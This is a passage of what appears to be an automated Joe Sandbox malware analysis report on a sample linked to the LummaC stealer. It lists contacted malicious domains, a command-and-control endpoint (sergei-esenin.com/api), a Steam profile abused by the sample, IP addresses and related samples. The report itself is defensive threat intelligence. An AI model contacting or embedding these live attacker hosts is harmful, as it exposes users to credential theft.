eaglepawnoy.store	unknown	unknown	true	19%, Virustotal, Browse	unknown
bathdoomgaz.store	unknown	unknown	true	22%, Virustotal, Browse	unknown
spirittunek.store	unknown	unknown	true	22%, Virustotal, Browse	unknown
licendfilteo.site	unknown	unknown	true	16%, Virustotal, Browse	unknown
studennotediw.store	unknown	unknown	true	18%, Virustotal, Browse	unknown
mobbipenju.store	unknown	unknown	true	22%, Virustotal, Browse	unknown
clearancek.site	unknown	unknown	true	18%, Virustotal, Browse	unknown
dissapoiznw.store	unknown	unknown	true	22%, Virustotal, Browse	unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
studennotediw.store	true	18%, Virustotal, Browse	unknown
dissapoiznw.store	true	22%, Virustotal, Browse	unknown
https://steamcommunity.com/profiles/76561199724331900	true	URL Reputation: malware	unknown
eaglepawnoy.store	true	19%, Virustotal, Browse	unknown
bathdoomgaz.store	true	22%, Virustotal, Browse	unknown
clearancek.site	true		unknown
spirittunek.store	true		unknown
licendfilteo.site	true		unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
https://www.cloudflare.com/learning/access-management/phishing-attack/	file.exe, 00000000.00000002.2249500388.00000000010F3000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2079771771.00000000010FC000.00000004.00000020.00020000.00000000.sdmp	false	0%, Virustotal, Browse	unknown
https://player.vimeo.com	file.exe, 00000000.00000003.2073091468.000000000113A000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://community.akamai.steamstatic.com/public/shared/javascript/auth_refresh.js?v=WgUxSlKTb3W1&amp	file.exe, 00000000.00000003.2079720283.000000000114C000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2072878197.0000000001145000.00000004.00000020.00020000.00000000.sdmp	false	0%, Virustotal, Browse	unknown
https://store.steampowered.com/;Persistent-AuthWWW-AuthenticateVarysteamCountry=US%7Cd7fb65801182a5f	file.exe, 00000000.00000003.2073053399.0000000001105000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2073091468.000000000113A000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://steamcommunity.com/?subsection=broadcasts	file.exe, 00000000.00000003.2079720283.000000000114C000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2072878197.0000000001145000.00000004.00000020.00020000.00000000.sdmp	false	0%, Virustotal, Browse	unknown
https://sergei-esenin.com/	file.exe, 00000000.00000003.2073053399.0000000001105000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2079771771.00000000010FC000.00000004.00000020.00020000.00000000.sdmp	true	0%, Virustotal, Browse	unknown
https://store.steampowered.com/subscriber_agreement/	file.exe, 00000000.00000003.2079720283.000000000114C000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2072878197.0000000001145000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://www.gstatic.cn/recaptcha/	file.exe, 00000000.00000003.2073091468.000000000113A000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://community.akamai.steamstatic.com/public/javascript/applications/community/libraries~b28b7af6	file.exe, 00000000.00000003.2072914440.000000000113F000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2072962019.00000000010C2000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2079720283.000000000114C000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2072878197.0000000001145000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.valvesoftware.com/legal.htm	file.exe, 00000000.00000003.2079720283.000000000114C000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2072878197.0000000001145000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://www.youtube.com	file.exe, 00000000.00000003.2073091468.000000000113A000.00000004.00000020.00020000.00000000.sdmp	false	0%, Virustotal, Browse	unknown
https://community.akamai.steamstatic.com/public/css/promo/summer2017/stickers.css?v=HA2Yr5oy3FFG&amp	file.exe, 00000000.00000003.2079720283.000000000114C000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2072878197.0000000001145000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://community.akamai.steamstatic.com/public/shared/images/responsive/logo_valve_footer.png	file.exe, 00000000.00000003.2079720283.000000000114C000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2072878197.0000000001145000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://www.google.com	file.exe, 00000000.00000003.2073091468.000000000113A000.00000004.00000020.00020000.00000000.sdmp	false	0%, Virustotal, Browse	unknown
https://community.akamai.steamstatic.com/public/shared/images/responsive/header_menu_hamburger.png	file.exe, 00000000.00000003.2079720283.000000000114C000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2072878197.0000000001145000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://community.akamai.steamstatic.com/public/shared/css/shared_responsive.css?v=sHIIcMzCffX6&	file.exe, 00000000.00000003.2079720283.000000000114C000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2072878197.0000000001145000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://www.valvesoftware.com/en/contact?contact-person=Translation%20Team%20Feedback	file.exe, 00000000.00000003.2079720283.000000000114C000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2072878197.0000000001145000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://community.akamai.steamstatic.com/public/javascript/scriptaculous/_combined.js?v=OeNIgrpEF8tL	file.exe, 00000000.00000003.2079720283.000000000114C000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2072878197.0000000001145000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://community.akamai.steamstatic.com/public/javascript/applications/community/manifest.js?v=hgPi	file.exe, 00000000.00000003.2072914440.000000000113F000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2072962019.00000000010C2000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2079720283.000000000114C000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2072878197.0000000001145000.00000004.00000020.00020000.00000000.sdmp	false	0%, Virustotal, Browse	unknown
https://s.ytimg.com;	file.exe, 00000000.00000003.2073091468.000000000113A000.00000004.00000020.00020000.00000000.sdmp	false		unknown
https://steam.tv/	file.exe, 00000000.00000003.2073091468.000000000113A000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://community.akamai.steamstatic.com/public/css/skin_1/header.css?v=NFoCa4OkAxRb&l=english	file.exe, 00000000.00000003.2079720283.000000000114C000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2072878197.0000000001145000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://steamcommunity.com/d	file.exe, 00000000.00000003.2072962019.00000000010F3000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2249500388.00000000010F3000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2079771771.00000000010FC000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2073078015.00000000010FB000.00000004.00000020.00020000.00000000.sdmp	false	0%, Virustotal, Browse	unknown
http://store.steampowered.com/privacy_agreement/	file.exe, 00000000.00000003.2072914440.000000000113F000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2079720283.000000000114C000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2072878197.0000000001145000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://store.steampowered.com/points/shop/	file.exe, 00000000.00000003.2079720283.000000000114C000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2072878197.0000000001145000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://www.cloudflare.com	file.exe, 00000000.00000002.2249500388.00000000010F3000.00000004.00000020.00020000.00000000.sdmp	false	0%, Virustotal, Browse	unknown
https://sketchfab.com	file.exe, 00000000.00000003.2073091468.000000000113A000.00000004.00000020.00020000.00000000.sdmp	false	0%, Virustotal, Browse	unknown
https://lv.queniujq.cn	file.exe, 00000000.00000003.2073091468.000000000113A000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://steamcommunity.com/profiles/76561199724331900/inventory/	file.exe, 00000000.00000003.2072914440.000000000113F000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2079720283.000000000114C000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2072878197.0000000001145000.00000004.00000020.00020000.00000000.sdmp	true	URL Reputation: malware	unknown
https://www.youtube.com/	file.exe, 00000000.00000003.2073091468.000000000113A000.00000004.00000020.00020000.00000000.sdmp	false	0%, Virustotal, Browse	unknown
https://avatars.akamai.steamstatic.com/fef49e7fa7e1997310d705b2a6158ff8dc1cdfeb_full.jpg	file.exe, 00000000.00000003.2072878197.0000000001145000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://store.steampowered.com/privacy_agreement/	file.exe, 00000000.00000003.2079720283.000000000114C000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2072878197.0000000001145000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://sergei-esenin.com/e.E:	file.exe, 00000000.00000003.2072878197.0000000001145000.00000004.00000020.00020000.00000000.sdmp	true		unknown
https://www.cloudflare.com/5xx-error-landing	file.exe, 00000000.00000003.2079771771.00000000010FC000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2079755763.000000000113B000.00000004.00000020.00020000.00000000.sdmp	false	0%, Virustotal, Browse	unknown
https://community.akamai.steamstatic.com/public/shared/css/shared_global.css?v=ezWS9te9Zwm9&l=en	file.exe, 00000000.00000003.2072878197.0000000001145000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://community.akamai.steamstatic.com/public/shared/javascript/tooltip.js?v=.zYHOpI1L3Rt0	file.exe, 00000000.00000003.2079720283.000000000114C000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2072878197.0000000001145000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://sergei-esenin.com:443/api	file.exe, 00000000.00000002.2249500388.00000000010F3000.00000004.00000020.00020000.00000000.sdmp	true	19%, Virustotal, Browse	unknown
https://community.akamai.steamstatic.com/public/css/applications/community/main.css?v=2Ih2WOq7ErXY&a	file.exe, 00000000.00000003.2072914440.000000000113F000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2072962019.00000000010C2000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2079720283.000000000114C000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2072878197.0000000001145000.00000004.00000020.00020000.00000000.sdmp	false	0%, Virustotal, Browse	unknown
https://community.akamai.steamstatic.com/public/share	file.exe, 00000000.00000003.2072878197.0000000001145000.00000004.00000020.00020000.00000000.sdmp	false	0%, Virustotal, Browse	unknown
https://sergei-esenin.com/pi	file.exe, 00000000.00000002.2249500388.00000000010F3000.00000004.00000020.00020000.00000000.sdmp	true	15%, Virustotal, Browse	unknown
https://community.akamai.steamstatic.com/public/shared/javascript/shared_global.js?v=REEGJU1hwkYl&am	file.exe, 00000000.00000003.2079720283.000000000114C000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2072878197.0000000001145000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://www.google.com/recaptcha/	file.exe, 00000000.00000003.2073091468.000000000113A000.00000004.00000020.00020000.00000000.sdmp	false	0%, Virustotal, Browse	unknown
https://checkout.steampowered.com/	file.exe, 00000000.00000003.2073091468.000000000113A000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://community.akamai.steamstatic.com/public/css/globalv2.css?v=PAcV2zMBzzSV&l=english	file.exe, 00000000.00000003.2072878197.0000000001145000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://community.akamai.steamstatic.com/public/javascript/modalv2.js?v=dfMhuy-Lrpyo&l=english	file.exe, 00000000.00000003.2079720283.000000000114C000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2072878197.0000000001145000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://community.akamai.steamstatic.com/public/shared/images/responsive/header_logo.png	file.exe, 00000000.00000003.2079720283.000000000114C000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2072878197.0000000001145000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://avatars.akamai.steamstatic	file.exe, 00000000.00000003.2073053399.0000000001105000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2073091468.000000000113A000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://community.akamai.steamstatic.com/public/css/skin_1/profilev2.css?v=M_qL4gO2sKII&l=englis	file.exe, 00000000.00000003.2079720283.000000000114C000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2072878197.0000000001145000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://community.akamai.steamstatic.com/public/javascript/jquery-1.11.1.min.js?v=.isFTSRckeNhC	file.exe, 00000000.00000003.2079720283.000000000114C000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2072878197.0000000001145000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://store.steampowered.com/;	file.exe, 00000000.00000003.2073091468.000000000113A000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://store.steampowered.com/about/	file.exe, 00000000.00000003.2072878197.0000000001145000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://steamcommunity.com/my/wishlist/	file.exe, 00000000.00000003.2079720283.000000000114C000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2072878197.0000000001145000.00000004.00000020.00020000.00000000.sdmp	false	0%, Virustotal, Browse	unknown
https://community.akamai.steamstatic.com/public/javascript/global.js?v=9OzcxMXbaV84&l=english	file.exe, 00000000.00000003.2079720283.000000000114C000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2072878197.0000000001145000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://help.steampowered.com/en/	file.exe, 00000000.00000003.2072878197.0000000001145000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://cdn.akamai.steamstatic.com/steamcommunity/public/assets/	file.exe, 00000000.00000003.2073091468.000000000113A000.00000004.00000020.00020000.00000000.sdmp	false	0%, Virustotal, Browse	unknown
https://steamcommunity.com/market/	file.exe, 00000000.00000003.2079720283.000000000114C000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2072878197.0000000001145000.00000004.00000020.00020000.00000000.sdmp	false	0%, Virustotal, Browse	unknown
https://store.steampowered.com/news/	file.exe, 00000000.00000003.2072878197.0000000001145000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://community.akamai.steamstatic.com/	file.exe, 00000000.00000003.2073091468.000000000113A000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2072878197.0000000001145000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://store.steampowered.com/subscriber_agreement/	file.exe, 00000000.00000003.2072914440.000000000113F000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2072962019.00000000010C2000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2079720283.000000000114C000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2072878197.0000000001145000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://steamcommunity.com/linkfilter/?u=http%3A%2F%2Fwww.geonames.org	file.exe, 00000000.00000003.2072914440.000000000113F000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2079720283.000000000114C000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2072878197.0000000001145000.00000004.00000020.00020000.00000000.sdmp	false	0%, Virustotal, Browse	unknown
https://community.akamai.steamstatic.com/public/css/skin_1/modalContent.css?v=.VpiwkLAYt9r1	file.exe, 00000000.00000003.2079720283.000000000114C000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2072878197.0000000001145000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://recaptcha.net/recaptcha/;	file.exe, 00000000.00000003.2073091468.000000000113A000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://community.akamai.steamstatic.com/public/javascript/promo/stickers.js?v=upl9NJ5D2xkP&l=en	file.exe, 00000000.00000003.2079720283.000000000114C000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2072878197.0000000001145000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://sergei-esenin.com/em	file.exe, 00000000.00000003.2072878197.0000000001145000.00000004.00000020.00020000.00000000.sdmp	true		unknown
https://sergei-esenin.com/apiU	file.exe, 00000000.00000002.2249500388.00000000010F3000.00000004.00000020.00020000.00000000.sdmp	true	4%, Virustotal, Browse	unknown
https://steamcommunity.com/discussions/	file.exe, 00000000.00000003.2072878197.0000000001145000.00000004.00000020.00020000.00000000.sdmp	false	0%, Virustotal, Browse	unknown
https://store.steampowered.com/stats/	file.exe, 00000000.00000003.2079720283.000000000114C000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2072878197.0000000001145000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://medal.tv	file.exe, 00000000.00000003.2073091468.000000000113A000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://broadcast.st.dl.eccdnx.com	file.exe, 00000000.00000003.2073091468.000000000113A000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://community.akamai.steamstatic.com/public/images/skin_1/footerLogo_valve.png?v=1	file.exe, 00000000.00000003.2072914440.000000000113F000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2079720283.000000000114C000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2072878197.0000000001145000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://store.steampowered.com/steam_refunds/	file.exe, 00000000.00000003.2079720283.000000000114C000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2072878197.0000000001145000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://steamcommunity.com/login/home/?goto=profiles%2F76561199724331900	file.exe, 00000000.00000003.2072878197.0000000001145000.00000004.00000020.00020000.00000000.sdmp	false		unknown
https://steamcommunity.com/I	file.exe, 00000000.00000003.2072962019.00000000010C6000.00000004.00000020.00020000.00000000.sdmp	false		unknown
https://community.akamai.steamstatic.com/public/javascript/webui/clientcom.js?v=jGtzAgjYROne&l=e	file.exe, 00000000.00000003.2079720283.000000000114C000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2072878197.0000000001145000.00000004.00000020.00020000.00000000.sdmp	false		unknown
https://store.steampowered.com/subscriber_ag	file.exe, 00000000.00000003.2072878197.0000000001145000.00000004.00000020.00020000.00000000.sdmp	false		unknown
https://steamcommunity.com/workshop/	file.exe, 00000000.00000003.2072878197.0000000001145000.00000004.00000020.00020000.00000000.sdmp	false		unknown
https://login.steampowered.com/	file.exe, 00000000.00000003.2073091468.000000000113A000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://store.steampowered.com/legal/	file.exe, 00000000.00000003.2072914440.000000000113F000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2079720283.000000000114C000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2072878197.0000000001145000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://community.akamai.steamstatic.com/public/javascript/reportedcontent.js?v=dAtjbcZMWhSe&l=e	file.exe, 00000000.00000003.2079720283.000000000114C000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2072878197.0000000001145000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://sergei-esenin.com/api6	file.exe, 00000000.00000003.2073053399.0000000001105000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2079771771.00000000010FC000.00000004.00000020.00020000.00000000.sdmp	true		unknown
https://community.akamai.steamstatic.com/public/shared/javascript/shared_responsive_adapter.js?v=pSv	file.exe, 00000000.00000003.2079720283.000000000114C000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2072878197.0000000001145000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://community.akamai.steamstatic.com/public/shared/css/motiva_sans.css?v=-DH0xTYpnVe2&l=engl	file.exe, 00000000.00000003.2072878197.0000000001145000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://recaptcha.net	file.exe, 00000000.00000003.2073091468.000000000113A000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://upx.sf.net	Amcache.hve.4.dr	false	URL Reputation: safe	unknown
https://store.steampowered.com/	file.exe, 00000000.00000003.2072878197.0000000001145000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://community.akamai.steamstatic.com/public/javascript/prototype-1.7.js?v=.55t44gwuwgvw	file.exe, 00000000.00000003.2079720283.000000000114C000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2072878197.0000000001145000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://community.akamai.steamstatic.com/public/images/skin_1/arrowDn9x5.gif	file.exe, 00000000.00000003.2072914440.000000000113F000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2072962019.00000000010C2000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2079720283.000000000114C000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2072878197.0000000001145000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://127.0.0.1:27060	file.exe, 00000000.00000003.2073091468.000000000113A000.00000004.00000020.00020000.00000000.sdmp	false		unknown
https://store.steampowered.com/steam_r	file.exe, 00000000.00000003.2072878197.0000000001145000.00000004.00000020.00020000.00000000.sdmp	false		unknown
https://community.akamai.steamstatic.com/public/sh	file.exe, 00000000.00000003.2072878197.0000000001145000.00000004.00000020.00020000.00000000.sdmp	false		unknown
https://community.akamai.steamstatic.com/public/shared/images/header/logo_steam.svg?t=962016	file.exe, 00000000.00000003.2079720283.000000000114C000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2072878197.0000000001145000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://store.steampowered.com/u:	file.exe, 00000000.00000003.2072878197.0000000001145000.00000004.00000020.00020000.00000000.sdmp	false		unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
104.102.49.254	steamcommunity.com	United States		16625	AKAMAI-ASUS	true
172.67.206.204	sergei-esenin.com	United States		13335	CLOUDFLARENETUS	true

General Information

Joe Sandbox version:	41.0.0 Charoite
Analysis ID:	1532864
Start date and time:	2024-10-14 03:06:11 +02:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 5m 8s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	10
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	file.exe
Detection:	MAL
Classification:	mal100.troj.evad.winEXE@3/9@10/2
EGA Information:	Successful, ratio: 100%
HCA Information:	Failed
Cookbook Comments:	Found application associated with file extension: .exe

Warnings

Exclude process from analysis (whitelisted): dllhost.exe, WerFault.exe, WMIADAP.exe, SIHClient.exe, svchost.exe
Excluded IPs from analysis (whitelisted): 20.42.65.92
Excluded domains from analysis (whitelisted): onedsblobprdeus17.eastus.cloudapp.azure.com, ocsp.digicert.com, login.live.com, slscr.update.microsoft.com, otelrules.azureedge.net, blobcollector.events.data.trafficmanager.net, ctldl.windowsupdate.com, umwatson.events.data.microsoft.com, fe3cr.delivery.mp.microsoft.com
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtQueryValueKey calls found.

Simulations

Behavior and APIs

Time	Type	Description
21:07:03	API Interceptor	3x Sleep call for process: file.exe modified
21:07:21	API Interceptor	2x Sleep call for process: WerFault.exe modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
104.102.49.254	http://gtm-cn-j4g3qqvf603.steamproxy1.com/	Get hash	malicious	Unknown	Browse	www.valvesoftware.com/legal.htm
172.67.206.204	file.exe	Get hash	malicious	LummaC	Browse
	file.exe	Get hash	malicious	LummaC	Browse
	SecuriteInfo.com.Win32.Evo-gen.15503.22039.exe	Get hash	malicious	LummaC	Browse
	SecuriteInfo.com.Variant.Lazy.606929.21165.21266.exe	Get hash	malicious	LummaC	Browse
	file.exe	Get hash	malicious	LummaC	Browse
	file.exe	Get hash	malicious	LummaC	Browse
	file.exe	Get hash	malicious	LummaC	Browse
	file.exe	Get hash	malicious	LummaC	Browse
	file.exe	Get hash	malicious	LummaC	Browse
	Setup.exe	Get hash	malicious	LummaC	Browse

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
sergei-esenin.com	file.exe	Get hash	malicious	LummaC	Browse	104.21.53.8
	file.exe	Get hash	malicious	LummaC	Browse	172.67.206.204
	file.exe	Get hash	malicious	LummaC	Browse	172.67.206.204
	SecuriteInfo.com.Win32.Evo-gen.15503.22039.exe	Get hash	malicious	LummaC	Browse	172.67.206.204
	SecuriteInfo.com.Win32.Evo-gen.11764.10915.exe	Get hash	malicious	LummaC	Browse	104.21.53.8
	file.exe	Get hash	malicious	LummaC	Browse	104.21.53.8
	file.exe	Get hash	malicious	LummaC	Browse	104.21.53.8
	SecuriteInfo.com.Variant.Lazy.606929.21165.21266.exe	Get hash	malicious	LummaC	Browse	172.67.206.204
	SecuriteInfo.com.Variant.Lazy.606929.30223.9667.exe	Get hash	malicious	LummaC	Browse	104.21.53.8
	file.exe	Get hash	malicious	LummaC	Browse	104.21.53.8
steamcommunity.com	file.exe	Get hash	malicious	LummaC	Browse	104.102.49.254
	file.exe	Get hash	malicious	LummaC	Browse	104.102.49.254
	file.exe	Get hash	malicious	LummaC	Browse	104.102.49.254
	SecuriteInfo.com.Win32.Evo-gen.15503.22039.exe	Get hash	malicious	LummaC	Browse	104.102.49.254
	SecuriteInfo.com.Win32.Evo-gen.11764.10915.exe	Get hash	malicious	LummaC	Browse	104.102.49.254
	file.exe	Get hash	malicious	LummaC	Browse	104.102.49.254
	file.exe	Get hash	malicious	LummaC	Browse	104.102.49.254
	SecuriteInfo.com.Variant.Lazy.606929.21165.21266.exe	Get hash	malicious	LummaC	Browse	104.102.49.254
	SecuriteInfo.com.Variant.Lazy.606929.30223.9667.exe	Get hash	malicious	LummaC	Browse	104.102.49.254
	file.exe	Get hash	malicious	LummaC	Browse	104.102.49.254

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
CLOUDFLARENETUS	rPayment_slip.exe	Get hash	malicious	Snake Keylogger	Browse	188.114.96.3
	file.exe	Get hash	malicious	LummaC	Browse	104.21.53.8
	file.exe	Get hash	malicious	LummaC	Browse	172.67.206.204
